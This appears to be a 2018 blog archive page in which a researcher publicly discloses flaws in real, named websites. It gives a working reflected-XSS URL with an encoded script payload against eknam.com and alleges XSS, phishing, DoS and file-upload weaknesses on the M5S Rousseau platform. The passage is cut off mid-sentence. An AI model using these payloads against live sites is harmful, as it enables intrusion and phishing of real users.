
Posts

Showing posts from September, 2018

http://www.eknam.com | xss, sql injection

/web/htdocs/www.eknam.com/home/default_files/meta_tag_query.php
/web/htdocs/www.eknam.com/home/default_files/contenuto_footer.php

XSS

XSS can be injected in almost all the parameters. Example:

http://www.eknam.com/blocchi_liv3.php?lingua=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22it&pagina=torte.php&class=

Archived: http://archive.is/5X39s

rousseau.movimento5stelle.it - movimento5stelle.it 2018 | xss, phishing, DoS, file upload

In the last few days someone has already exposed sensitive information about M5S. I don't have/own/store/view that sensitive information! After the "supposed" security breach, M5S told newspapers and their users that all the security problems have been "fixed" and that they are investing a lot of money in "security" with professional companies. I don't know what they are doing but, if true, they are mostly wasting their own money or that of their donors. Note that they already got an email message, some time ago, and they didn't fix the problems specified in the message and available in a previous post.

Movable Type is still the 2009 version (we are in 2018) and they haven't updated or fixed it. Check the previous post and the CVEs!

They added an XSS protection but they haven't fixed them (XSS) in the scripts. It's possible to create "phishing" pages (this is an example/joke). NOTE : what